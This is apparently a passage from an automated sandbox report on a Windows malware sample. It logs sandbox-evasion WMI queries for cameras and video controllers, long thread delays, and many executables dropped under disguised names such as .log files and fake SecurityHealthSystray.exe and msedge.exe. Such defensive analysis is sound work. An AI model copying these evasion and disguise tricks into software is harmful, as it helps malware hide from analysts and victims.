                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: 2AE0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: 1ACF0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Memory allocated: 2C50000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Memory allocated: 1ADB0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Memory allocated: 2F80000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Memory allocated: 1B200000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: 16C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: 1B240000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: D50000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: 1A920000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Memory allocated: FE0000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Memory allocated: 1AB60000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: BB0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: 1A750000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: 1880000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: 1B320000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Memory allocated: E50000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Memory allocated: 1ABC0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: D20000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: 1A830000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Memory allocated: 15D0000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Memory allocated: 1AF80000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 600000
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 599843
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 599625
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 598718
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 598524
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 598234
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 598077
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 3600000
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597718
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597541
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597404
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597275
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597153
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597046
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 596933
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 596813
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 596557
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 596015
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595825
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595640
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595468
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595265
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595120
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594988
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594859
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594723
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594598
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594468
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3024Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1235
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1180
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1788
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1427
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1264
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1139
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1199
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1151
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1401
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1304
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1344
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1360
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1173
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2252
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1607
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1365
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1378
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWindow / User API: threadDelayed 7767
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWindow / User API: threadDelayed 1730
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\bIYNCAnX.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\PNvPNCKx.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\QZUgHzbG.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\yHSRySXa.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\zKTiJdVm.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\JTIguxNU.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\MlnyqaSB.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\XjppJZgg.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\ioFvQtnJ.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\wQQSSdrw.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\AKEAUBbV.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\VNlekvqu.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\aZffRVgZ.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\RORqBBDl.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\qhLtZjFE.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\LeSOATlM.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\vcMKgPvy.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\xYZkNoRc.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\OXbzuEDs.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\HobYtWlT.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\taabLgrD.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\koiTwEAQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\LmCheCMS.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\cmFWEbPY.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\ohiUtZsx.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\fXkmLoaR.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\mcmciRwO.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\GzkiCFwe.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\HyVANeDN.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\oXLUJmZB.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\JVSqkWFI.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\ScGOdifB.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\jrGLbElV.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\BQsBwRkl.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\vWmBrFMh.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\ftgCpYKW.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\pkjlEjqK.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\XPYNFevp.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\FcMrvptI.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZInvrbgn.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\OoZhLKXw.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\pSWUxCdp.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\TQKWOvbz.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\GrAQXWWY.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 2284Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep count: 3024 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9092Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8872Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep count: 1235 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9140Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8880Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep count: 1180 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8832Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep count: 1788 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 612Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8912Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep count: 1427 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9176Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8920Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep count: 1264 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8896Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756Thread sleep count: 1139 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8936Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep count: 1199 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9180Thread sleep time: -9223372036854770s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8204Thread sleep count: 1151 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364Thread sleep count: 1401 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9160Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8928Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8536Thread sleep count: 1304 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9172Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8888Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464Thread sleep count: 1344 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9188Thread sleep time: -13835058055282155s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8460Thread sleep count: 1360 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9168Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8684Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8560Thread sleep count: 1173 > 30
